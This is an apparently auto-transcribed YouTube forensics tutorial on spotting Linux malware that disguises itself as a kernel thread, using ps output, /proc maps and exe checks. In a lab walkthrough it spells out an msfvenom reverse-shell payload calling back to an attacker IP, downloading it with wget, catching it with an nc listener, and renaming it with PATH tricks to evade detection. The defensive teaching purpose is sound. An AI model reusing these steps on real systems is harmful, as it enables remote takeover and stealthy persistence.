Hello everyone, how have you been? Welcome to my channel. In today's video, we are going to learn some interesting stuff. And it's been so long time since I have done some forensic related content. So in this video, I'm going to do the same. And recently, I came across a tweet which actually triggered my curiosity, and I found the tweet was very interesting. And I continued to read the tweet, and I found an incredible stuff to share with you guys. So without further ado, let me share the same. Now you are looking at the tweet that I really admired a lot, and you see the tweet. It's from a security researcher, Craig Rowland from Sandfly Security, and he is at DEF CON right now. Uh, you can see the tweet. You can find the Linux malware masquerading as a kernel thread using this command. So he actually gave the command to see the kernel threads and some intriguing kernel threads that typically used to hide the malware in it. So this is the command he simply mentioned, but we need to know the PID, but I'll explain how to find this stuff. But I found this one very interesting. And before we start diving into this, first of all, let's understand what is kernel thread, because it is essential to know what is kernel thread before we start diving this. So let's see this. I just did the ChatGPT. I asked ChatGPT about this kernel thread, and it gave me some comprehensive response. You see the response here apparently. In Linux, a kernel thread is a type of thread that runs in a kernel space rather than the user space. So in any operating system, you see the applications may run either in a user space or kernel space. The application we typically use, like Microsoft Teams or Google browser, the Chrome browser, Chrome, Firefox, Burp Suite, some hypervisors. I'm not sure about the hypervisors, but the text editors like VS Code, Sublime Text. So all these applications run at user mode, but user space. But there are some other applications that needs kernel space to run. It runs in the kernel space, which is nothing but it runs in a lower level, directly interacts with the kernel. It is actually playing a huge role in the interaction with the hardwares that are connected to the system, right? So in the Linux kernel threads are simply nothing but it runs in a kernel space. The kernel threads are used by operating system to perform certain tasks. I think if you are a malware researcher, you might have heard this term, thread. Thread is actually a component of an operating system which is used to execute or perform some task. Okay, you can keep the term thread like that in your mind, and that require direct access to the hardware or system resources. They are essential for handling low-level operations that user-level processes are not allowed to perform directly. Well, that's an important stuff. And you see the key characteristics of kernel threads. Execution in kernel space. Kernel threads execute in kernel space, which means they have access to all system resources and can directly interact with the hardware. That's the gist of this kernel thread, because it can directly talk to the lower level to the hardwares. So that's the important stuff. And in recent CrowdStrike issue, they actually caused a global outage, right? So that was actually happened because of a driver that pulled a wrong or maybe a file contains the wrong logic. The driver pulled that wrong logic file, which caused that BSOD error globally, right? So just for your information. And create and management. Kernel threads are created and managed by kernel. They are used for tasks such as handling interrupts, managing input-output operation, and system-level activities. And you see the further activities that are done by kernel threads. Fine. Now, you see the examples of kernel threads. K-thread add. This is the kernel thread daemon responsible for creating other kernel threads. Let me show this kernel thread in a moment, but before that, it is like a parent. It's like a root of a kernel thread, which is actually responsible for creating all other kernel threads, right? So that's the definition for this K-thread D. Then this is another kernel thread. You can see the name. It starts with K typically, but not all the kernel threads. There is an exception here. And KSWAPD manages swapping and paging operations, handling, writing dirty pages back to disk. I'm not positive what try to say the term dirty pages, but anyway, let's move on. Creating kernel threads, and here is a simple C program that creates a kernel thread for us. These are all for information. I just wanted to give you an insight what are kernel threads before we start diving into what we thought to do. Well, let's begin. I actually have two operating systems. You see, I opened a Parrot operating system, and also I have an Ubuntu operating system, and I'm going to showcase that the real stuff. What if a process, a malicious process, hides as a kernel thread, and how you can find that in real term, in real time assessment. Okay, so that's what we are about to see. So without further ado, let's dive in. Here is a thread, but before, okay, let me get you through this thread. And here is a command. You see, he's actually asking us to use this command to check whether the kernel process is valid or not. Once you found a suspicious process, you need to use that process ID, and that's what this tweet is all about. And I check this, I check the thread, and you see here, malware will name itself with brackets to impersonate a Linux thread, Linux kernel thread. Bracketed names mean no command line arguments. Kernel threads almost always in brackets, and this is an important characteristics or a property of a kernel thread. It won't have a command line argument. Usually when we are executing any program, any user level program, for example Python or any other stuff, we typically use an argument when we manually try something, right? But kernel thread usually don't have any argument, and the program is actually enclosed with a square bracket. I'll show that in a moment. And for that, let's see, I created a directory DFIR Linux process forensics, but let me show the kernel thread how it would look like. I use PSAUX to show the list of processes, and you see the bunch of processes that are listed. And now you are looking at all the processes that are running in this machine, and you see bunch of processes that are enclosed with a square bracket, and whatever the processes that are enclosed with the square brackets are kernel threads, which is running in a kernel space. And you can see some normal processes like this, and it has some arguments as well, which is not the case in the kernel thread. Kernel threads don't have any argument. That's actually an important stuff to recognize a kernel thread, a valid kernel thread. But that alone is not sufficient in our case, in our current scenario. Let me show that in a moment. But before that, let's try to differentiate this. Let's understand how to differentiate the normal process and a kernel thread. Okay, whatever the thread that is enclosed in a square bracket, that is actually a kernel thread, arguably, because it could be a masqueraded process. That's what I'm going to explain it in a moment. But you can see ps space aux is the command, and if you use w additionally, you see some wide outcome of these processes. You see that you see both user mode and kernel threads, user mode process and the kernel thread. Well, that's fine. And if I use F, I think it will show the tree structure, forest structure, and you see here, and it shows the parent process and its child process. Similarly, it will show for kernel threads as well. And you see, I'll scroll to the top, and you see the kernel thread here, the top kernel thread, K thread D. Do you remember the ChatGPT outcome? A thread. So this is the kernel thread mentioned over there. It is actually a root thread, like a root of all the kernel threads. So this is what creating all other kernel threads. Okay, so this has to be just one in a normal scenario. All right, so now we are seeing the bunch of kernel threads that are created and created by this K thread D kernel thread. Fine. Now let's go here, and he is actually asking us to use this command, the same command we have used just now, ps space auxwf, but he's asking us to grep for the square bracket just to separately print the, let me show that, give me a second, square bracket, but I need to escape the square bracket, so backward slash. So it just print the kernel threads available, and you see some kernel threads. Most of the threads are ran by root, but I see one one kernel thread which is executed by user Avahi. I'm not sure what is Avahi, so let me Google this. Avahi kernel thread, what it is. Maybe Ubuntu. I'll search it like this. I'm just trying to validate whether it's a valid thread or not. Looks like it is associated with Ubuntu, so it is inherently comes with the Ubuntu, but I'm not positive. It is not a suspicious or intriguing kernel thread. Fine. Now let's move to the concept. I'm just continuing to read this tweet. Any Linux process that looks like a kernel thread should have an empty maps file. This is actually another indicator. It won't have an argument. Apart from that, if you look for that specific process and its map file, it should be empty for a legitimate kernel thread. So let's validate that. I'll pick a process. I'll pick a kernel thread. For example, let's take a kernel thread, an interesting one. Okay, K compact D0. I see the process ID is 38. I'll pick this one this time. So let's see. I'm going to go and read that. Proc and 38, I suppose. 38, right? Yeah, 38. 38. And then maps, to see the memory maps of the specific process memory, and I should see an empty value because this is actually a real kernel thread, so I don't see any value. Let's try another one. How about taking this R crypt? Okay, the process ID is 1387, so let me do the same. 1387, and here I don't see anything because it's a legit kernel thread. And let me check this one. 874 permission denied, but I don't think it possesses any intriguing stuff, any suspicious stuff. It is actually a typical kernel thread, I suppose, for Ubuntu, specific to Ubuntu. Fine. Now this is how you need to validate. This is one of the ways to validate a legitimacy of a kernel thread. Okay, just check its maps file. It should be empty. That's the legitimate case for any kernel thread. Fine. So that's what they are explaining it here. Fine. Now, if you see any entry in that kernel thread, then that is not a kernel thread. That is not a real kernel thread. That is a malware masquerading or hiding as pretending to be a kernel thread. Fine. Now, we actually seen this. Let's scroll down, and you can quickly crawl over all the PIDs to see if their maps have data with it. And here is a huge command which is actually piping to multiple commands and gives us all the process IDs, all the kernel threads PIDs, and if it is having some maps file, then it will display that maps file here. You can see the screenshot attached in this tweet. Yeah, it should look like this. Okay, now before we practically try this, but I just want to try this command and show you we are getting all the empty map files. We have no suspicious stuff happening here. And look at this bunch of process IDs. None of the processes contains a maps entry. It's empty. So legit kernel thread. Fine. And I'm scrolling down. I'll just try to post this link in the description so that you can refer if you want to learn more. All right. This simple command just shows any PID that is not a child of kthread-d. It's simple, but it works and gets you onto the problem fast. Well, I've said this right. All the kernel threads created by this kthread-d, it is also a kernel thread. But this command, when you use this, it will give you other kernel threads that are not the child of this kthread-d. You see the Avahi. This is what I was suspecting earlier. I found this was suspicious, but it is not really. I checked it. I validated its legitimacy. It is associated with Ubuntu. That's fine. Now, we found this is another command to ensure there are no abnormal threads, kernel threads. Now I am actually showing this in my Ubuntu machine. There is no abnormal stuffs happening here. But before, I want to show the abnormal case. I want to execute some command, maybe some a file as a kernel thread, and I want you to I mean not I want to show you that how it can be identified. Okay, let me create this scenario, some abnormal scenario, and I'll show you how to detect that. All right, but before that, let's read through this blog. If I miss anything to say, then you can read through this blog and understand. Linux kernel thread sandfly security. Actually, not only the tweet, sandfly security also published a blog about this. So this blog actually says how to find a kernel thread that is masquerading with command line. I mean, that is masquerading. A process that is masquerading as a kernel thread, a malicious one. Fine, let's read through this fastly. On Linux kernel has On the Linux, the kernel has many threads created to help with system tasks. These threads can be for scheduling tasks, disk IO, etc. When you use a standard process listing commands like ps, these threads will show up in the bracket, square bracket. We discussed it earlier. The brackets denote the process has no command line argument, which usually means it's spawned as a thread. So for thread, there is no command line argument. And here is a simple command to check out the list of kernel threads and also the typical process which is running in user mode. What Linux kernel thread masquerading look like? Linux malware uses variety of techniques to hide from detection. One method they will use is to try to impersonate a Linux kernel thread by making a process show in a bracket. So they are actually enclosing that process in a bracket. So that is the indication for kernel threads around its name. In the PS listing, administrator can easily overlook a malicious process this way. If you look at the listing below, we have started a process to hide itself by trying to look like a kernel thread. Now they are actually showing an image. In this image, they say they actually hide a malicious process. They are actually asking us to check. Can you witness that? Can you see that? And I can see bunch of processes here, and I don't recognize the abnormal one because all the processes look same. So we need to see the maps file otherwise to check whether the kernel thread is valid or not. But here, when you just see the process list, you will not recognize if they are executing it as a kernel thread. That's actually a more dangerous thing when you are hiding something, when threat actor is hiding something as a kernel thread. Fine. Now actually they actually try to recreate that stuff. They recreate some abnormal situation with this command. So I'm going to do it. I'm not going to explain all these stuffs, but before that, you just see, and here they actually executing a kernel thread, and you see an argument. They are using an argument for this specific process, so which is not a kernel thread. If you see the maps file, you will see some entries here. So that is actually an anomaly. All right, fine. Now you see they are actually witnessing the map file, and they see a bunch of libraries associated with it, and also the path of the file, the suspicious file. So this command is very helpful if you are doing the forensics. And once you get the outcome, and you can directly go to the path, the pertaining path, and you can pick that binary and do the assessment. And another interesting stuff they have shown here. There is another command. Not only the maps, you can also try exe. When you try this exe for that respective suspicious process, it will give you the binary file associated with the process. Once you are able to retrieve the binary, then you can do the malware analysis on that file. Malware analysis. You can follow the typical malware analysis process and assess the behavior of the file. And that could be another way to check and ensure the work that is done by the process. All right. So I already spoke a lot. I've been speaking for last 20 minutes. Now it is time to get into the action. I'll go here, and maybe I created a thing. Now I want to go to this parrot system. I'm gonna create an MSF venom payload, and I'm going to transfer the MSF venom payload from parrot to my Ubuntu machine. The Ubuntu machine is going to be a victim machine, and the parent machine is going to be an attacking machine. In parrot machine, I'm going to enable a listener, and once the payload is executed, we will from the Ubuntu, we will get a shell from the Ubuntu. So that the shell will be active. So once the shell is active, we will be having a process on the Ubuntu system, and we are going to make that process as a Linux thread, so that I'll show an assessment, and I'll try to I'll analyze that, and I'll try to show how dangerous it could be when adversary is hiding something as a Linux kernel thread. Well, okay, let's do this. I'll create a payload first. MSF venom -p, that is the tag p to create a payload, and I'm using Linux x64 and shell underscore reverse underscore TCP. That's the shell I want. All right, and I use lhost, and the lhost is nothing but my my current parent machine IP, which is nothing but 192.168.0.111, and L port I am mentioning, and the L port is 9001. I'm gonna enable my listener on port 9001, and -f, I'm gonna store this file as an ELF file because my victim is a Linux machine, and -o, and how I can store this, I will just store it as shell, okay, for time being. And this is a command to generate a simple reverse shell binary using MSF venom. All right, so it will create our reverse shell binary in a moment. It is created, and let me check the file. It is ELF file, Linux executable, statically linked. All right, I got the file right now, and now I am going to host this file to Ubuntu machine by using the Python HTTP server. All right, I'll go to Ubuntu machine, and here I have, do I have wget? I do. http://192 192.168.0.111 port 8000, and the file name is shell. Now I have downloaded this file, and look, I'm looking at this file. All right, fine, we have the file. I'm changing it as executable, okay, and now what I need to do, I need to put it as kernel thread. So that is not a rocket science. You can simply rename it with the square brackets enclosed, right? That's very simple. I'm gonna go and make that change. Here I'll gonna rename this like this, not a shell. I'll give some other name similar to a kernel thread name. What I can give, let me see a kernel thread, AUX pipe grep. Here I'm escaping square bracket, and I'm searching this. How about giving PSI mon? It is an existing kernel thread, so let me use the same name. Hopefully it should not cause any issue. PSI mon. So let me do that. PSI mon. So I'm using this name. I have created. Yeah, and now I'm having my shell. I'm having a binary which is going to give me a reverse shell. So let me execute this first. PSI mon. Now I'm executing this, but before that, let me enable the listener on my parent machine. Close this web server. nc-lv-np 9001 is the port that I configured on the binary. I'll go here and execute this. Maybe I background this process. How about this? 7328. Remember the process name. 7328. All right. I go here, and you see the connection is established. I got the reverse shell from my Ubuntu machine. Host name maybe. So it is actually an Ubuntu reverse shell. All right. Now I go here. Let me keep. Now I switched it. Now you see an ongoing process which is giving a reverse shell to my parent machine, an attacking machine. Now let's see how to investigate it. 7328 is the process name, so I remember that. 7328. Fine. PSAUX. All right, or WF to give a tree view, tree structure. And here I see that I want to see the kernel thread. So let's see 7328. I see the bash, our current session. I'm not seeing that uh, kernel thread yet, but let me check that grep like this. Okay, escape it. PSI mon. How about searching this? And look at this. One kernel thread is legitimate kernel thread, and other kernel thread is not legitimate. You can see it is being executed by a different user, which is myself. This is another indicator. But when the kernel thread is when the malware is being executed as root, then it might be difficult to identify unless you try that maps command. All right, now let me try the command one by one. The command that we witnessed in that tweet. So let me check this. I paste this command. I grab this ps aux grep. Let me explain what this command does. So this is the command, and it is grepping the outcome that starts with the square bracket, and once it got that outcome, it is just putting that outcome into the grep command, and for that it is just searching for this specific symbols, backward slash and underscore, just to find the children. So that's what happening in this. I copy this and I paste this. Let me do that like this. Or what happened? It's hung. I think so. All right, now I'm seeing this. I'm not getting anything in this, but let me try this one. It will show the memory map of all the kernel threads. Weird. I don't see that. I don't see the kernel, the memory map of that kernel thread, but do I still have this shell? I still have it, so it must be there. All right, I think I lost this. I'm gonna go and check this. How I can do that? Backward slash square bracket like this. So PSA mon is the program I executed, and I don't see it here. This is the process run by root. And I lost. I'm not positive what happening. Yeah, I think, yeah, look at this. I see two PSI mon. Okay, let me try that then. PSI mon. Okay, 148413337. So let me check this memory maps for this. Proc. First I'll check 1337 and maps. I don't see 484. 484 like this. No, 7850. 7850. No such file or directory. exe. No. All right. Let me start this again. I'll go and execute this like this. Now it is running. You see the prompt still there. I'll search for the thread this time. Do I get? and I see this one executed by me 5968, and if I go and execute this command, do I get any memory maps? No, I don't get. So I think I'm trying something different. So I should have just tried to replicate what they are doing. Fine. So let me do that. I'm gonna go and create a path like this. So what it does, I'm just adding uh, my current path, my present working directory in the path environment variable. So let me do that. Let me check that. Now it's successfully added. I see the path, not this one. Wait. Okay. Now can I try that? Can I try PSI mon? No. Okay, I'll just check this. I'm just copying the binary the sleep binary, and I'm putting it into temp directory. Or how about putting the same PSI mon into temp directory? Sudo sorry. PSI mon. Do I have the file? At least, yeah, I do have. I copy this and sudo cp. I'm moving it to temp directory. Okay, like this. Okay, now I have it in temp directory. Let me execute it from temp. This one. All right, now it is owned by root. Let me run it from temp. Okay, I'll use the same command like this. Now can I see this temp path added to path environment variable? Path, can I see temp at least? I'm not sure what's happening here. I'm unable to see, but I see two dots. It's added actually, but it is adding just dot like this. But I want to add like this, temp to path. Now can I see this? Yeah, now I see the temp directory added, and let me run this right now. I'm gonna go and close this shell. Again, starting this. I don't need to add this dot slash, so which will increase the legitimacy of that process. So it will actually help that threat actor to evade the detection, right? So that when they are when the researcher is manually looking, so the manual detection can be evaded by using this simple environment variable addition. Fine. I go here and do search that PSI mon like this. So I'm just typing the process name. It is automatically displaying because I added that specific TMP path in that path variable. All right. Now that is fine. I execute this and I add the ampersand to run it in a background. 8365, that's the process name. I remember this time, last time I didn't use this. I got the shell. Now it is running 8365. All right, I go to cat like this, proc 8365, and I see the maps file. Let's see. I'm seeing the maps file here, and look at this. It is having some content. Now let's see the process tree. PSAUXWF pipe grep escaping the square bracket and looking the search 8365. And let's see that the 8365 here. Do I see do I see it here? 8365, it is not displaying, however. 8365, it's not displaying here. Okay, did I make any mistake? They ran the binary in this way. They enclosed it with the double quotes, and they are executing it. What if I do that in that? What if I do it in that way? 8365 is not showing here in the kernel thread list. So obviously, it is running as a normal process. Let me check that. 8365. I'll grep it. 8365. Okay. It's running as a normal process. Okay. It's running as a normal process. Fine. Can I search like PSI mon like this? I'll check this 8427. I'll check this once. 8427. 1337. 1337. No. Okay, I think I'm committing some mistake here while executing. Okay, I'll do like this. PSI mon, maybe with a single quote. PSI mon, like this. Okay. Backgrounding this 8439. Okay, I'll check the process. 8439. Eight four three nine. I don't see that the process in the kernel or in a kernel thread list. I found this blog is very old, so why not? There might be some remediations against this. There might be some prevention that deployed that prevents us from running a normal process as a kernel thread. Possible, right? It's actually a pretty old stuff, but I don't think it is valid anymore. I use this command once again to see if I'm overlooking anything. No, though I add my program name with the double quotes and run it, it is still not, I'm still unable to masquerade it as a Linux. I mean, I'm still able to masquerade a Linux kernel thread, which is actually a good news, right? Now I'll do one thing. I'll do one last thing. I'll try to replicate the same stuff that they did. They took the sleep binary and they tried running it as a kernel thread. I'll try to do that. I'll try to replicate it. Let me go here. Maybe, okay, not here. This blog only. I'm gonna go and search that. Yeah, here it is. I already added the path. The temp path is already in the path list. And let me copy this sleep binary, which sleep, user bin sleep. So I need to copy this. Sudo cp and to current path, maybe as a kernel thread, k worker d. I'll give the same name as they gave the S like this. So I'm currently in a temp path. So I'm redirecting or copying the file to this name. Looks fine. Now I see K worker D. Now let me run this in the same way that they did, like this, single quote, and I'm just sleeping it for 120 seconds, which means 2 minutes, and backgrounding this process 8922 and PSAUXWF pipe web and escaping the square bracket 8922 K worker D. Look at this. All right. So this is what, now I am able to see that kernel thread. But earlier when I was using the binary that I generated from Metasploit, somehow I couldn't show that. Maybe I'll try to rename this in a bit. But you see this here. We see the K worker D. You see the argument here, which is not a case for kernel thread. And I use this command to detect the specific kernel thread that we created. So there is no protection. I can do it on sleep binary, and you see this 8922. It has some memory maps, and you see the file here. It is stored in the TMP directory, temp directory, and you see the file name. So whenever you witness a kernel thread holding the memory maps entry, then you should look at that files and the libraries pertaining to it. Fine. Now we found this is actually a sleep binary, nothing else, nothing malicious. And also I can just confirm this 8922, right? Okay, I'll cat this process 8922 and exe like this. It will show me the binary. Okay, I can simply do one thing, SHA-256 sum. Excuse me, no such file or directory. I think it is done. Now I'm doing it again, 9341 and 9341. I see this hash value. Let's do the comparison. SHA-256 sum of USR binary sleep. So the same binary. So you can also use this command to grab the binary, or you can just see here this location to grab that associated binary, the binary associated with the kernel thread. Fine. When I used the sleep binary, it was working really fine. But when I tried the PSImon, it was not working. Now let me rename this, and I rename it as K worker D, and check this rm-rf K worker D like this, operation not permitted. Like this. Sudo. All right. Now I removed it and I rename it to PSImon. I'm renaming it to K worker D. All right, like this. Operation not permitted. So let me do it as sudo. I've done that. Now I go to parrot again. I close this and I enable the listener again. I started the listener, switching back to the victim machine, and here, sorry. Okay, and here I got the still PSImon. Sudo mv PSImon to K worker D, like this. Earlier it was not done because the process was in use, it was running, so that's why I couldn't manipulate its name. Now I could do that, and it's like this. And I'll run this. How about k worker? I'll copy this name and try. How about backgrounding it? Listener is still on. I'm backgrounding it. I don't see this. Command not found. What? Can I echo the path? It's gone. Okay, I'll just put the path again. No, it's supposed to be in a temp path, right? Like this. I go to temp path. What binary it is? Let's see. Yeah, now I got the shell, and I executed a correct binary from from the temp directory, and now I should see the process list. Let's check that. PS AUX WF, yeah, pipe, um, escaping it. Sorry, escaping it like this. Command not found. Grep, sorry. Now I could see K worker D. Can I see that? No. But what about the process name? I background this. I'm gonna go and start this listener again and execute this and see the process 9508. Let's check that. 9508. I do not see that. 9508. I do not see that. Let me check 9508. It's running as a normal process. Okay. All right. I didn't expect that. I thought I could execute this reverse shell binary like I did the sleep binary. But I was able to masquerade the sleep binary as a kernel thread, but at the same time I couldn't masquerade that metasploit reverse shell binary as a kernel thread, which is actually a crucial finding. I need to do more research on this, but this is the weird stuff that I found today. Hopefully I've had some incredible learning session. I've learned something new, definitely. Yeah, awesome blog. I'll do one thing. I'll post this link in the description, so if you want to dig more into it, you can feel free to do that. All right. Yeah, I think it's time to end this video. We've done some cool stuff right today. I didn't expect that to happen. I thought to show you that Metasploit reverse shell, and also that digging that process, how to find that binary. I wanted to show all those stuffs, but I didn't expect it would happen like this. It will happen like this. So totally fine. It happens sometimes, but at the end, it's all learning. I found I couldn't masquerade my Metasploit binary as a kernel thread, which is actually a huge finding, right? That's fine. That's okay. And the learning prevails. Fine. Now, yeah, I think that's it. We came to the end of this video, and hope you really enjoyed it. You have learned something new, I hope. If you really did do the YouTube algorithms, like, comment, subscribe, feel free to share this with your friends, and you can uh, catch me next time with another exciting one. And I'll see you next time with another exciting one. Until then, I'm signing off. Cheers, and I love you all. Thank you so much.